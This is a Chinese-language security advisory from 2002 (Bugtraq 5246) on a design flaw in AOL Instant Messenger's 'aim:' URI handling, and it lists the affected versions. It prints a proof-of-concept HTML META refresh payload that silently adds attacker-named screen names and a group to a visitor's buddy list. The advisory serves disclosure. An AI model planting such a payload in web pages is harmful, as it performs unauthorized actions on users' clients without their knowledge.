|
|
AOL Instant Messenger存在未授权操作漏洞 发布时间:2002-07-22 更新时间:2002-07-22 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式
BUGTRAQ ID:5246
受影响系统AOL Instant Messenger 4.5
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows CE 2.0
- Microsoft Windows CE 3.0
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
AOL Instant Messenger 4.7
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows CE 2.0
- Microsoft Windows CE 3.0
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
AOL Instant Messenger 4.7.2480
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows CE 2.0
- Microsoft Windows CE 3.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a 详细描述 AOL Instant Messenger客户端允许恶意用户构造恶意HTML来执行一些未授权的操作,如增加条目到buddy list,问题存在与客户端处理"aim:" URI时,当进行这些恶意操作的时候并不会提醒用户。
<META
HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>
当WEB页被浏览时,META REFRESH标识符可以自动增加组到用户的buddylist调用mindfliporg,增加mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon到用户组中。
测试代码 见描述
解决方案 无
相关信息 orb <orb@mindflip.org>
参考:http://online.securityfocus.com/archive/1/282443
|